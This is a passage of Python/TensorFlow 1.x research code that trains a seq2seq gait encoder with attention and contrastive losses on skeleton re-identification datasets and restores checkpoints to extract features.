    lstm_weights_2 = tf.Variable(weights[3], dtype=tf.float32, name='lstm_weights_layer_2')
    training_decoder_output, predicting_decoder_output, training_state, predicting_state = GD(
        decoding_embedding_size,
        num_layers,
        rnn_size,
        target_sequence_length,
        source_sequence_length,
        max_target_sequence_length,
        encoder_output,
        encoder_state,
        decoder_input)
    if use_attention:
        # per-step alignment matrices recorded by the AttentionWrapper
        attention_matrices = training_state.alignment_history.stack()
        return training_decoder_output, predicting_decoder_output, lstm_weights_1, lstm_weights_2, attention_matrices
    else:
        return training_decoder_output, predicting_decoder_output, lstm_weights_1, lstm_weights_2
def train(folder_name, dim, train_dataset=False):
    '''
    Build and train the gait encoder-decoder (plus optional contrastive
    head) on one coordinate dimension of the chosen dataset, then save the
    model and loss curves under `folder_name`.

    parameters:
        - folder_name: output directory for checkpoints and loss arrays
        - dim: coordinate dimension ('x', 'y' or 'z')
        - train_dataset: one of 'KGBD', 'IAS', 'BIWI', 'KinectReID', 'KS20'

    Behavior depends on several global flags:
        - use_attention: adds Luong attention and (for attention == 'LA'/'LA-R')
          a locality-oriented attention loss
        - Frozen == '0': contrastive loss is folded into the main objective;
          Frozen == '1': a separate contrastive head is trained on frozen AGEs
        - Reverse: when False, targets are replaced by the inputs themselves
    '''
    print("wsx log: enter train() folder_name dim train_dataset",folder_name,'\t',dim,'\t',train_dataset)
    global series_length, time_steps, dataset, attention, Frozen, epochs
    # --- load (input, target) sequence pairs for the requested dataset ---
    if train_dataset == 'KGBD':
        input_data_, targets_ = get_data_KGBD(dim, fr=time_steps)
        epochs = 150
    elif train_dataset == 'IAS':
        input_data_, targets_ = get_data_IAS(dim, fr=time_steps)
    elif train_dataset == 'BIWI':
        # BIWI loader also returns a held-out split
        input_data_, targets_, t_input_data_, t_targets_ = get_data_BIWI(dim, fr=time_steps)
    elif train_dataset == 'KinectReID':
        input_data_, targets_ = get_data_KinectReID(dim, fr=time_steps)
    elif train_dataset == 'KS20':
        input_data_, targets_ = get_data_KS20(dim, fr=time_steps)
    else:
        raise Error('No dataset is chosen!')
    if not Reverse:
        # plain reconstruction: targets are the (unreversed) inputs
        targets_ = copy.deepcopy(input_data_)
        if train_dataset == 'BIWI':
            t_targets_ = copy.deepcopy(t_input_data_)
    train_graph = tf.Graph()
    encoding_embedding_size = 128
    decoding_embedding_size = 128
    # --- graph construction ---
    with train_graph.as_default():
        input_data, targets, lr, lr_decay_op, target_sequence_length, max_target_sequence_length, source_sequence_length, keep_prob = get_inputs()
        if use_attention:
            training_decoder_output, predicting_decoder_output, lstm_weights_1, lstm_weights_2, attention_matrices = encoder_decoder(input_data,
                                                                                                                                    targets,
                                                                                                                                    lr,
                                                                                                                                    target_sequence_length,
                                                                                                                                    max_target_sequence_length,
                                                                                                                                    source_sequence_length,
                                                                                                                                    encoding_embedding_size,
                                                                                                                                    decoding_embedding_size,
                                                                                                                                    rnn_size,
                                                                                                                                    num_layers)
        else:
            training_decoder_output, predicting_decoder_output, lstm_weights_1, lstm_weights_2 = encoder_decoder(input_data,
                                                                                                                targets,
                                                                                                                lr,
                                                                                                                target_sequence_length,
                                                                                                                max_target_sequence_length,
                                                                                                                source_sequence_length,
                                                                                                                encoding_embedding_size,
                                                                                                                decoding_embedding_size,
                                                                                                                rnn_size,
                                                                                                                num_layers)
        training_decoder_output = training_decoder_output.rnn_output
        predicting_output = tf.identity(predicting_decoder_output.rnn_output, name='predictions')
        training_output = tf.identity(predicting_decoder_output.rnn_output, name='train_output')
        # reconstruction loss (L2 between decoded frames and targets)
        train_loss = tf.reduce_mean(tf.nn.l2_loss(training_decoder_output - targets))
        print("wsx log traing_loss")
        print("wsx log training_decoder_output shape",training_decoder_output.shape)
        print("wsx log targets shape",targets.shape)
        real_loss = tf.identity(train_loss, name='real_loss')
        # raw encoder outputs, fetched by graph tensor name
        encoder_output = train_graph.get_tensor_by_name('rnn/transpose_1:0')
        if use_attention:
            attention_matrices = tf.identity(attention_matrices, name='train_attention_matrix')
            # Locality-oriented attention loss: penalize attention mass far
            # from a Gaussian window centered on the aligned frame
            if attention == 'LA' or attention == 'LA-R':
                objective_attention = np.ones(shape=[time_steps, time_steps])
                for index, _ in enumerate(objective_attention.tolist()):
                    if not Reverse:
                        pt = index
                    else:
                        # reversed targets: center index mirrors the frame order
                        pt = time_steps - 1 - index
                    D = time_steps
                    objective_attention[index][pt] = 1
                    for i in range(1, D+1):
                        if pt + i <= time_steps - 1:
                            objective_attention[index][min(pt + i, time_steps - 1)] = np.exp(-(i)**2/(2*(D/2)**2))
                        if pt-i >= 0:
                            objective_attention[index][max(pt-i, 0)] = np.exp(-(i)**2/(2*(D/2)**2))
                    objective_attention[index][pt] = 1
                objective_attention = np.tile(objective_attention, [batch_size, 1, 1])
                objective_attention = objective_attention.swapaxes(1,0)
                att_loss = tf.reduce_mean(tf.nn.l2_loss(attention_matrices - attention_matrices * objective_attention))
                train_loss += att_loss
            if Frozen == '0':
                # Joint training: build AGEs (attention-weighted encoder
                # outputs) and add a SimCLR-style contrastive loss in-graph
                attention_trans = tf.transpose(attention_matrices, [1, 0, 2])
                AGEs = tf.matmul(attention_trans, encoder_output)
                AGEs = tf.reshape(AGEs, [batch_size, -1])
                first_size = rnn_size * time_steps
                # C_input = tf.placeholder(tf.float32, [None, first_size], name='C_input')
                C_lr = tf.Variable(0.0005, trainable=False, dtype=tf.float32, name='learning_rate')
                # learning_rate_1:0
                # two-layer projection head for contrastive learning
                W1 = tf.Variable(tf.random_normal([first_size, rnn_size]), name='W1')
                b1 = tf.Variable(tf.zeros(shape=[rnn_size, ]), name='b1')
                Wx_plus_b1 = tf.matmul(AGEs, W1) + b1
                l1 = tf.nn.relu(Wx_plus_b1)
                W = tf.Variable(tf.random_normal([rnn_size, rnn_size]), name='W')
                b = tf.Variable(tf.zeros(shape=[rnn_size, ], name='b'))
                contrast_v = tf.matmul(l1, W) + b
                # print (encoder_output)
                # print(attention_trans)
                # print(AGEs)
                # print(contrast_v)
                # exit(1)
                # add_2:0
                # with tf.name_scope("C_train"):
                t = temperature
                C_optimizer = tf.train.AdamOptimizer(learning_rate, name="Adam_C")
                # adjacent samples act as positive pairs (NT-Xent style)
                z1 = contrast_v[1:]
                z2 = contrast_v[:-1]
                z = tf.concat((z1, z2), axis=0)
                unorm_sim = tf.matmul(z, tf.transpose(z))
                z_norm = tf.sqrt(tf.reduce_sum(tf.pow(z, 2), axis=1))
                z_norm = tf.expand_dims(z_norm, axis=1)
                norm_matrix = tf.matmul(z_norm, tf.transpose(z_norm))
                # cosine similarity scaled by temperature t
                sim = unorm_sim / (t * norm_matrix)
                C_loss = tf.zeros(1)
                sample_num = batch_size - 1
                for i in range(sample_num):
                    C_loss = C_loss - tf.log(
                        tf.exp(sim[i, i + sample_num]) / (tf.reduce_sum(tf.exp(sim[i, :])) - tf.exp(sim[i, i])))
                    C_loss = C_loss - tf.log(tf.exp(sim[i + sample_num, i]) / (
                            tf.reduce_sum(tf.exp(sim[i + sample_num, :])) - tf.exp(
                        sim[i + sample_num, i + sample_num])))
                C_loss = C_loss / (2 * sample_num)
                # C_train_op = C_optimizer.minimize(C_loss)
                train_loss += C_loss
                # print (C_lr, C_loss, contrast_v)
                # <tf.Variable 'learning_rate_1:0' shape=() dtype=float32_ref>
                # Tensor("C_train/truediv_255:0", shape=(1,), dtype=float32)
                # Tensor("add_2:0", shape=(128, 256), dtype=float32)
                # exit(1)
        else:
            # no attention: contrast directly on the flattened encoder states
            h_s = tf.reshape(encoder_output, [batch_size, -1])
            first_size = rnn_size * time_steps
            C_lr = tf.Variable(0.0005, trainable=False, dtype=tf.float32, name='learning_rate')
            W1 = tf.Variable(tf.random_normal([first_size, rnn_size]), name='W1')
            b1 = tf.Variable(tf.zeros(shape=[rnn_size, ]), name='b1')
            Wx_plus_b1 = tf.matmul(h_s, W1) + b1
            l1 = tf.nn.relu(Wx_plus_b1)
            W = tf.Variable(tf.random_normal([rnn_size, rnn_size]), name='W')
            b = tf.Variable(tf.zeros(shape=[rnn_size, ], name='b'))
            contrast_v = tf.matmul(l1, W) + b
            t = temperature
            C_optimizer = tf.train.AdamOptimizer(learning_rate, name="Adam_C")
            z1 = contrast_v[1:]
            z2 = contrast_v[:-1]
            z = tf.concat((z1, z2), axis=0)
            unorm_sim = tf.matmul(z, tf.transpose(z))
            z_norm = tf.sqrt(tf.reduce_sum(tf.pow(z, 2), axis=1))
            z_norm = tf.expand_dims(z_norm, axis=1)
            norm_matrix = tf.matmul(z_norm, tf.transpose(z_norm))
            sim = unorm_sim / (t * norm_matrix)
            C_loss = tf.zeros(1)
            sample_num = batch_size - 1
            for i in range(sample_num):
                C_loss = C_loss - tf.log(
                    tf.exp(sim[i, i + sample_num]) / (tf.reduce_sum(tf.exp(sim[i, :])) - tf.exp(sim[i, i])))
                C_loss = C_loss - tf.log(tf.exp(sim[i + sample_num, i]) / (
                        tf.reduce_sum(tf.exp(sim[i + sample_num, :])) - tf.exp(
                    sim[i + sample_num, i + sample_num])))
            C_loss = C_loss / (2 * sample_num)
            train_loss += C_loss
        # L2 weight regularization over all trainable variables except biases
        l2 = lambda_l2_reg * sum(
            tf.nn.l2_loss(tf_var)
            for tf_var in tf.trainable_variables()
            if not ("noreg" in tf_var.name or "Bias" in tf_var.name)
        )
        # train_loss += att_loss
        cost = tf.add(l2, train_loss, name='cost')
        with tf.name_scope("optimization"):
            # Optimizer
            optimizer = tf.train.AdamOptimizer(lr, name='Adam')
            # Gradient Clipping
            gradients = optimizer.compute_gradients(cost)
            capped_gradients = [(tf.clip_by_value(grad, -5., 5.), var) for grad, var in gradients if grad is not None]
            train_op = optimizer.apply_gradients(capped_gradients, name='train_op')
        # Contrast learning after freezing AGEs: a separate head fed via the
        # C_input placeholder with AGEs computed outside the graph
        if Frozen == '1':
            first_size = rnn_size * time_steps
            C_input = tf.placeholder(tf.float32, [None, first_size], name='C_input')
            lr = tf.Variable(0.0005, trainable=False, dtype=tf.float32, name='learning_rate')
            # learning_rate_1:0
            W1 = tf.Variable(tf.random_normal([first_size, rnn_size]), name='W1')
            b1 = tf.Variable(tf.zeros(shape=[rnn_size, ]), name='b1')
            Wx_plus_b1 = tf.matmul(C_input, W1) + b1
            l1 = tf.nn.relu(Wx_plus_b1)
            W = tf.Variable(tf.random_normal([rnn_size, rnn_size]), name='W')
            b = tf.Variable(tf.zeros(shape=[rnn_size, ], name='b'))
            contrast_v = tf.matmul(l1, W) + b
            # add_16:0
            with tf.name_scope("C_train"):
                t = temperature
                C_optimizer = tf.train.AdamOptimizer(learning_rate, name="Adam_C")
                z1 = contrast_v[1:]
                z2 = contrast_v[:-1]
                # cost = tf.reduce_mean(tf.nn.softmax_cross_entropy_with_logits(logits=pred, labels=y_input))
                # (batch_size-1, )
                z = tf.concat((z1, z2), axis=0)
                unorm_sim = tf.matmul(z, tf.transpose(z))
                z_norm = tf.sqrt(tf.reduce_sum(tf.pow(z, 2), axis=1))
                z_norm = tf.expand_dims(z_norm, axis=1)
                # z_norm = z_norm.unsqueeze(1)
                norm_matrix = tf.matmul(z_norm, tf.transpose(z_norm))
                # norm_matrix = z_norm.mm(z_norm.t())
                sim = unorm_sim / (t * norm_matrix)
                # print (z, unorm_sim, z_norm, norm_matrix, sim)
                # exit(1)
                # sim = unorm_sim / (self.t * norm_matrix)
                # # print(sim[batch_size+2, 5])
                # # print(sim[5, batch_size+2])
                # # exit(1)
                # loss = torch.zeros(1, requires_grad=True)
                C_loss = tf.zeros(1)
                # loss = Variable(loss.type(Tensor))
                # sample_num = z1.size(0)
                sample_num = batch_size - 1
                # for i in range(sample_num):
                #     loss = loss - torch.log(
                #         torch.exp(sim[i, i + sample_num]) / (torch.sum(torch.exp(sim[i, :])) - torch.exp(sim[i, i])))
                #     loss = loss - torch.log(torch.exp(sim[i + sample_num, i]) / (
                #             torch.sum(torch.exp(sim[i + sample_num, :])) - torch.exp(
                #         sim[i + sample_num, i + sample_num])))
                for i in range(sample_num):
                    C_loss = C_loss - tf.log(
                        tf.exp(sim[i, i + sample_num]) / (tf.reduce_sum(tf.exp(sim[i, :])) - tf.exp(sim[i, i])))
                    C_loss = C_loss - tf.log(tf.exp(sim[i + sample_num, i]) / (
                            tf.reduce_sum(tf.exp(sim[i + sample_num, :])) - tf.exp(
                        sim[i + sample_num, i + sample_num])))
                C_loss = C_loss / (2 * sample_num)
                # gradients = optimizer.compute_gradients(cost)
                # capped_gradients = [(tf.clip_by_value(grad, -5., 5.), var) for grad, var in gradients if grad is not None]
                C_train_op = C_optimizer.minimize(C_loss)
    # correct_pred = tf.equal(tf.argmax(pred, 1),tf.argmax(y_input, 1))
    # accuracy = tf.reduce_mean(tf.cast(correct_pred, tf.float32))
    # --- data preparation (first batch doubles as a validation batch) ---
    input_data_ = np.array(input_data_)
    targets_ = np.array(targets_)
    # just not permuated first
    # permutation = np.random.permutation(input_data_.shape[0])
    # input_data_= input_data_[permutation]
    # targets_ = targets_[permutation]
    train_source = input_data_
    train_target = targets_
    train_source = train_source.tolist()
    train_target =train_target.tolist()
    # input_data_ = input_data_.tolist()
    # targets_ = targets_.tolist()
    valid_source = train_source[:batch_size]
    valid_target = train_target[:batch_size]
    # print(len(train_source), len(train_target), len(valid_source), len(valid_target))
    (valid_targets_batch, valid_sources_batch, valid_targets_lengths, valid_sources_lengths) = next(
        get_batches(valid_target, valid_source, batch_size, source_pad_int=0, target_pad_int=0))
    display_step = 50
    checkpoint = "./" + folder_name + "/trained_model.ckpt"
    best_checkpoint = './' + folder_name + '/best_model.ckpt'
    # --- training session ---
    with tf.Session(graph=train_graph, config=config) as sess:
        sess.run(tf.global_variables_initializer())
        print('Begin Training on Dimension [' + dim.upper() + ']')
        train_loss = []
        test_loss = []
        c_train_loss = []
        # ring buffer of the last 3 validation losses (for lr decay / stop)
        losses = [0, 0, 0]
        loss_cnt = 0
        conv_cnt = 0
        best_val = 100000
        over_flag = False
        if use_attention:
            alignment_history = train_graph.get_tensor_by_name('train_attention_matrix:0')
            encoder_output = train_graph.get_tensor_by_name('rnn/transpose_1:0')
        for epoch_i in range(1, epochs + 1):
            if over_flag:
                break
            for batch_i, (targets_batch, sources_batch, targets_lengths, sources_lengths) in enumerate(
                    get_batches(train_target, train_source, batch_size, source_pad_int=0, target_pad_int=0)):
                # print (sources_batch[5, 3:, :])
                # print (sources_batch[6, :3, :])
                # print (sources_batch[9, 3:, :])
                # print (sources_batch[10, :3, :])
                # exit(1)
                if use_attention:
                    if Frozen == '0':
                        # joint step: reconstruction + contrastive loss together
                        _, loss, c_loss, att, en_outputs, att_history = sess.run(
                            [train_op, real_loss, C_loss, attention_matrices, encoder_output, alignment_history],
                            {input_data: sources_batch,
                             targets: targets_batch,
                             lr: learning_rate,
                             C_lr: learning_rate,
                             target_sequence_length: targets_lengths,
                             source_sequence_length: sources_lengths,
                             keep_prob: 0.5})
                    else:
                        # frozen mode: train the seq2seq first, then feed the
                        # resulting AGEs into the separate contrastive head
                        _, loss, att, en_outputs, att_history = sess.run([train_op, real_loss, attention_matrices, encoder_output, alignment_history],
                                                                         {input_data: sources_batch,
                                                                          targets: targets_batch,
                                                                          lr: learning_rate,
                                                                          target_sequence_length: targets_lengths,
                                                                          source_sequence_length: sources_lengths,
                                                                          keep_prob: 0.5})
                        att_batch = []
                        for index in range(en_outputs.shape[0]):
                            t1 = np.reshape(en_outputs[index], [-1]).tolist()
                            # NOTE(review): `AGEs` here is read as a flag — presumably a
                            # global boolean toggling attention-weighted features; confirm
                            if use_attention and AGEs:
                                # attention-weight the encoder outputs per sample
                                weights = att_history[:, index, :]
                                f_o = en_outputs[index, :, :]
                                att_op = np.matmul(weights, f_o)
                                # if manner == 'sc':
                                att_op = np.reshape(att_op, [-1]).tolist()
                                att_batch.append(att_op)
                        att_batch = np.array(att_batch)
                        _, c_loss, c_vec = sess.run([C_train_op, C_loss, contrast_v],
                                                    {C_input: att_batch,
                                                     lr: learning_rate
                                                     })
                        # print(c_loss)
                        # else:
                        #     X.extend(att_op.tolist())
                else:
                    _, loss = sess.run([train_op, real_loss],
                                       {input_data: sources_batch,
                                        targets: targets_batch,
                                        lr: learning_rate,
                                        target_sequence_length: targets_lengths,
                                        source_sequence_length: sources_lengths,
                                        keep_prob: 0.5})
                # if batch_i % display_step == 0:
                # validation runs every batch (epoch_i % 1 is always 0)
                if epoch_i % 1 == 0:
                    if Frozen == '0':
                        validation_loss, c_loss = sess.run(
                            [real_loss, C_loss],
                            {input_data: valid_sources_batch,
                             targets: valid_targets_batch,
                             lr: learning_rate,
                             C_lr: learning_rate,
                             target_sequence_length: valid_targets_lengths,
                             source_sequence_length: valid_sources_lengths,
                             keep_prob: 1.0})
                    else:
                        # single-element fetch list: validation_loss is a list here
                        validation_loss = sess.run(
                            [real_loss],
                            {input_data: valid_sources_batch,
                             targets: valid_targets_batch,
                             lr: learning_rate,
                             target_sequence_length: valid_targets_lengths,
                             source_sequence_length: valid_sources_lengths,
                             keep_prob: 1.0})
                    # if epoch_i % 25 == 0 and validation_loss[0] < best_val:
                    #     saver = tf.train.Saver()
                    #     saver.save(sess, best_checkpoint)
                    #     print('The Best Model Saved Again')
                    #     best_val = validation_loss[0]
                    train_loss.append(loss)
                    if Frozen == '1':
                        c_train_loss.append(c_loss[0])
                        test_loss.append(validation_loss[0])
                        losses[loss_cnt % 3] = validation_loss[0]
                        print(
                            'Epoch {:>3}/{} Batch {:>4}/{} - Training Loss: {:>6.3f} - Validation loss: {:>6.3f} - Contrastive loss: {:>6.3f}'
                            .format(epoch_i,
                                    epochs,
                                    batch_i,
                                    len(train_source) // batch_size,
                                    loss,
                                    validation_loss[0],
                                    c_loss[0]))
                    else:
                        c_train_loss.append(c_loss[0])
                        test_loss.append(validation_loss)
                        losses[loss_cnt % 3] = validation_loss
                        print(
                            'Epoch {:>3}/{} Batch {:>4}/{} - Training Loss: {:>6.3f} - Validation loss: {:>6.3f} - Contrastive loss: {:>6.3f}'
                            .format(epoch_i,
                                    epochs,
                                    batch_i,
                                    len(train_source) // batch_size,
                                    loss,
                                    validation_loss,
                                    c_loss[0]))
                    loss_cnt += 1
                    # print(losses)
                    # early stop once lr has decayed at least once and the
                    # validation loss stops improving
                    # NOTE(review): validation_loss[0] assumes the list-valued
                    # Frozen == '1' path; in the scalar path this would raise — confirm
                    if conv_cnt > 0 and validation_loss[0] >= max(losses):
                        over_flag = True
                        break
                    # decay lr when the last three validation losses are equal
                    # to 5 decimal places (training has plateaued)
                    if (round(losses[(loss_cnt - 1) % 3], 5) == round(losses[loss_cnt % 3], 5)) and (round(losses[(loss_cnt - 2) % 3], 5)\
                        == round(losses[loss_cnt % 3], 5)) :
                        sess.run(lr_decay_op)
                        conv_cnt += 1
        saver = tf.train.Saver()
        saver.save(sess, checkpoint)
        print('Model Trained and Saved')
        np.save(folder_name + '/train_loss.npy', np.array(train_loss))
        np.save(folder_name + '/test_loss.npy', np.array(test_loss))
        np.save(folder_name + '/c_train_loss.npy', np.array(c_train_loss))
def encoder_classify(model_name, dimension, type, dataset):
    """Restore a trained gait-encoding model and extract gait features (CAGEs).

    Loads the train/test skeleton sequences of one coordinate axis, rebuilds
    the self-supervised targets for the configured pretext task (``Model``),
    then (further below) runs the sequences through the restored encoder to
    collect per-sequence features with matching identity labels.

    Args:
        model_name: name of the encoder model.  NOTE(review): unused in the
            visible portion of this function — confirm against the remainder.
        dimension: coordinate axis to process, 'x'/'y'/'z'; also reported as
            step number (ord(dimension) - ord('x') + 1) out of 3.
        type: which encoder signal becomes the feature ('c', 'ch', 'o', 'oc',
            'att' or 'attc').  NOTE: shadows the builtin ``type``.
        dataset: dataset name; 'IAS' is special-cased with two test splits
            (IAS-A and IAS-B).

    Relies on module-level configuration globals (Model, Reverse, frames_ps,
    time_steps, series_length, ...).
    """
    global manner, transfer
    number = ord(dimension) - ord('x') + 1
    print('Run the gait encoding model to obtain CAGEs (%d / 3)' % number)
    global epochs, series_length, attention, Frozen, C_reid, view
    epochs = 200
    # Optional view sub-directory inside the dataset folders.
    if view != '':
        view_dir = view + '/'
    else:
        view_dir = ''
    # Training sources for this axis: (num_seqs, time_steps, series_length).
    _input_data = np.load('Datasets/' + frames_ps + view_dir + dataset + '_train_npy_data/source_' + dimension + '_'+ dataset + '_'+str(time_steps)+'.npy')
    _input_data = _input_data.reshape([-1, time_steps, series_length])
    # Build targets for the configured pretext task:
    #  - 'rev_rec' / 'rev_rec_plus': load the precomputed (reversed) targets;
    #  - 'prediction': predict the next frame (inputs shifted by one step,
    #    last frame duplicated to keep the shapes equal);
    #  - 'sorting': targets are the original order, inputs get a random
    #    temporal permutation per sequence.
    if Model == 'rev_rec' or Model == 'rev_rec_plus':
        _targets = np.load('Datasets/'+ frames_ps + view_dir + dataset + '_train_npy_data/target_' + dimension + '_' + dataset + '_'+str(time_steps)+'.npy')
        _targets = _targets.reshape([-1, time_steps, series_length])
    # prediction
    elif Model == 'prediction':
        _targets = np.concatenate((_input_data[1:, :, :], _input_data[-1, :, :].reshape([1, time_steps, series_length])),
                                  axis=0)
        # _input_data = _input_data[:-1]
    # permutation
    elif Model == 'sorting':
        _targets = copy.deepcopy(_input_data)
        for i in range(_input_data.shape[0]):
            permutation_ = np.random.permutation(time_steps)
            _input_data[i] = _input_data[i, permutation_]
    # Test data: IAS has two splits (A and B), other datasets a single one.
    # The per-split target construction mirrors the training branch above.
    if dataset == 'IAS':
        t_input_data = np.load(
            'Datasets/' + frames_ps + dataset + '_test_npy_data/t_source_' + dimension + '_' + dataset + '-A_' + str(
                time_steps) + '.npy')
        t_input_data = t_input_data.reshape([-1, time_steps, series_length])
        if Model == 'rev_rec' or Model == 'rev_rec_plus':
            t_targets = np.load(
                'Datasets/' + frames_ps + dataset + '_test_npy_data/t_target_' + dimension + '_' + dataset + '-A_' + str(
                    time_steps) + '.npy')
            t_targets = t_targets.reshape([-1, time_steps, series_length])
        elif Model == 'prediction':
            t_targets = np.concatenate(
                (t_input_data[1:, :, :], t_input_data[-1, :, :].reshape([1, time_steps, series_length])), axis=0)
            # t_input_data = t_input_data[:-1]
        # permutation
        elif Model == 'sorting':
            t_targets = copy.deepcopy(t_input_data)
            for i in range(t_input_data.shape[0]):
                permutation_ = np.random.permutation(time_steps)
                t_input_data[i] = t_input_data[i, permutation_]
        t_2_input_data = np.load(
            'Datasets/' + frames_ps + dataset + '_test_npy_data/t_source_' + dimension + '_' + dataset + '-B_' + str(
                time_steps) + '.npy')
        t_2_input_data = t_2_input_data.reshape([-1, time_steps, series_length])
        if Model == 'rev_rec' or Model == 'rev_rec_plus':
            t_2_targets = np.load(
                'Datasets/' + frames_ps + dataset + '_test_npy_data/t_target_' + dimension + '_' + dataset + '-B_' + str(
                    time_steps) + '.npy')
            t_2_targets = t_2_targets.reshape([-1, time_steps, series_length])
        elif Model == 'prediction':
            t_2_targets = np.concatenate(
                (t_2_input_data[1:, :, :], t_2_input_data[-1, :, :].reshape([1, time_steps, series_length])), axis=0)
            # t_2_input_data = t_2_input_data[:-1]
        # permutation
        elif Model == 'sorting':
            t_2_targets = copy.deepcopy(t_2_input_data)
            for i in range(t_2_input_data.shape[0]):
                permutation_ = np.random.permutation(time_steps)
                t_2_input_data[i] = t_2_input_data[i, permutation_]
    else:
        t_input_data = np.load('Datasets/' + frames_ps + view_dir + dataset + '_test_npy_data/t_source_' + dimension + '_' + dataset + '_'+str(time_steps)+'.npy')
        t_input_data = t_input_data.reshape([-1, time_steps, series_length])
        if Model == 'rev_rec' or Model == 'rev_rec_plus':
            t_targets = np.load('Datasets/' + frames_ps + view_dir + dataset + '_test_npy_data/t_target_' + dimension + '_' + dataset + '_'+str(time_steps)+'.npy')
            t_targets = t_targets.reshape([-1, time_steps, series_length])
        elif Model == 'prediction':
            t_targets = np.concatenate(
                (t_input_data[1:, :, :], t_input_data[-1, :, :].reshape([1, time_steps, series_length])), axis=0)
            # t_input_data = t_input_data[:-1]
        # permutation
        elif Model == 'sorting':
            t_targets = copy.deepcopy(t_input_data)
            for i in range(t_input_data.shape[0]):
                permutation_ = np.random.permutation(time_steps)
                t_input_data[i] = t_input_data[i, permutation_]
    # Identity -> sample-index mapping, stored as a pickled dict inside a
    # 0-d object array, hence the .item() call below.
    ids = np.load('Datasets/' + frames_ps + view_dir + dataset + '_train_npy_data/ids_' + dataset +'_'+str(time_steps)+'.npy')
    # print(ids)
    # exit(0)
    ids = ids.item()
    # Plain (non-reversed) reconstruction: targets are the inputs themselves.
    if not Reverse:
        _targets = copy.deepcopy(_input_data)
        t_targets = copy.deepcopy(t_input_data)
        if dataset == 'IAS':
            t_2_targets = copy.deepcopy(t_2_input_data)
    # print(ids)
    if dataset == 'IAS':
        t_ids = np.load('Datasets/' + frames_ps + dataset + '_test_npy_data/ids_' + dataset + '-A_'+str(time_steps)+'.npy')
        t_ids = t_ids.item()
        t_2_ids = np.load('Datasets/' + frames_ps + dataset + '_test_npy_data/ids_' + dataset + '-B_'+str(time_steps)+'.npy')
        t_2_ids = t_2_ids.item()
    else:
        t_ids = np.load('Datasets/' + frames_ps + view_dir + dataset + '_test_npy_data/ids_' + dataset + '_'+str(time_steps)+'.npy')
        t_ids = t_ids.item()
    # print(t_ids)
    # Select which trained checkpoint(s) to restore.
    #  - transfer == 'None': use this dataset's own checkpoint; for
    #    'rev_rec_plus' the LA reverse-reconstruction checkpoint is combined
    #    with separate 'prediction' and 'sorting' checkpoints
    #    (checkpoint_1 / checkpoint_2).
    #  - otherwise: reuse the checkpoint trained on the `transfer` dataset.
    if transfer == 'None':
        if Model == 'rev_rec_plus':
            # modify: using LA for the proposed reconstruction
            checkpoint = 'Models/Gait_Encoding_models/' + dataset + '_' + 'LA' + '_' + dimension + '_' + str(time_steps) \
                         + '_' + str(temperature) + '_' + str(Frozen) + view + 'pre_rev_rec' + "/trained_model.ckpt"
            checkpoint_1 = 'Models/Gait_Encoding_models/' + dataset + '_' + attention + '_' + dimension + '_' + str(
                time_steps) \
                           + '_' + str(temperature) + '_' + str(Frozen) + view + 'pre_prediction' + "/trained_model.ckpt"
            checkpoint_2 = 'Models/Gait_Encoding_models/' + dataset + '_' + attention + '_' + dimension + '_' + str(
                time_steps) \
                           + '_' + str(temperature) + '_' + str(Frozen) + view + 'pre_sorting' + "/trained_model.ckpt"
        else:
            checkpoint = 'Models/Gait_Encoding_models/' + dataset + '_' + attention + '_' + dimension + '_' + str(
                time_steps) \
                         + '_' + str(temperature) + '_' + str(
                Frozen) + view + 'pre_' + pre_task + "/trained_model.ckpt"
        # print(checkpoint)
        # print(checkpoint_1)
        # print(checkpoint_2)
        # exit(1)
    else:
        checkpoint = 'Models/Gait_Encoding_models/' + transfer + '_' + attention + '_' + dimension + '_' + str(
            time_steps) \
                     + '_' + str(temperature) + '_' + str(Frozen) + view + "/trained_model.ckpt"
    # Restore the saved graph and look up its tensors by name.  These are the
    # auto-generated TF 1.x op names produced when the training graph was
    # built ('add_16', 'rnn/while/Exit_N', ...), so they are brittle: any
    # change to the graph-construction code invalidates them.
    if Model != 'rev_rec_plus':
        loaded_graph = tf.Graph()
        with tf.Session(graph=loaded_graph, config=config) as sess:
            loader = tf.train.import_meta_graph(checkpoint + '.meta')
            loader.restore(sess, checkpoint)
            input_data = loaded_graph.get_tensor_by_name('inputs:0')
            targets = loaded_graph.get_tensor_by_name('targets:0')
            # Contrastive-branch tensors; the frozen and unfrozen graphs name
            # them differently.
            if Frozen == '1':
                contrast_v = loaded_graph.get_tensor_by_name('add_16:0')
                C_lr = loaded_graph.get_tensor_by_name('learning_rate_1:0')
                # NOTE(review): 'C_inptuiut' looks like a typo, but it must
                # match the placeholder name used at graph-build time — do not
                # "fix" it here without also changing the builder.
                C_input = loaded_graph.get_tensor_by_name('C_inptuiut:0')
            else:
                contrast_v = loaded_graph.get_tensor_by_name("add_2:0")
                C_lr = loaded_graph.get_tensor_by_name('learning_rate_1:0')
            # Encoder outputs and final LSTM states (c/h per layer); the
            # bidirectional graph exposes a second, backward set.
            if Bi_LSTM:
                encoder_output = loaded_graph.get_tensor_by_name('bidirectional_rnn/fw/fw/transpose_1:0')
                encoder_c_1 = loaded_graph.get_tensor_by_name('bidirectional_rnn/fw/fw/while/Exit_3:0')
                encoder_h_1 = loaded_graph.get_tensor_by_name('bidirectional_rnn/fw/fw/while/Exit_4:0')
                encoder_c = loaded_graph.get_tensor_by_name('bidirectional_rnn/fw/fw/while/Exit_5:0')
                encoder_h = loaded_graph.get_tensor_by_name('bidirectional_rnn/fw/fw/while/Exit_6:0')
                # NOTE(review): this name contains a space before '0' —
                # verify it actually resolves in the saved graph.
                encoder_output_bw = loaded_graph.get_tensor_by_name('ReverseSequence: 0')
                encoder_c_1_bw = loaded_graph.get_tensor_by_name('bidirectional_rnn/bw/bw/while/Exit_3:0')
                encoder_h_1_bw = loaded_graph.get_tensor_by_name('bidirectional_rnn/bw/bw/while/Exit_4:0')
                encoder_c_bw = loaded_graph.get_tensor_by_name('bidirectional_rnn/bw/bw/while/Exit_5:0')
                encoder_h_bw = loaded_graph.get_tensor_by_name('bidirectional_rnn/bw/bw/while/Exit_6:0')
                predictions = loaded_graph.get_tensor_by_name('predictions:0')
            else:
                encoder_output = loaded_graph.get_tensor_by_name('rnn/transpose_1:0')
                encoder_c_1 = loaded_graph.get_tensor_by_name('rnn/while/Exit_3:0')
                encoder_h_1 = loaded_graph.get_tensor_by_name('rnn/while/Exit_4:0')
                encoder_c = loaded_graph.get_tensor_by_name('rnn/while/Exit_5:0')
                encoder_h = loaded_graph.get_tensor_by_name('rnn/while/Exit_6:0')
                predictions = loaded_graph.get_tensor_by_name('predictions:0')
            # train_output = loaded_graph.get_tensor_by_name('train_output:0')
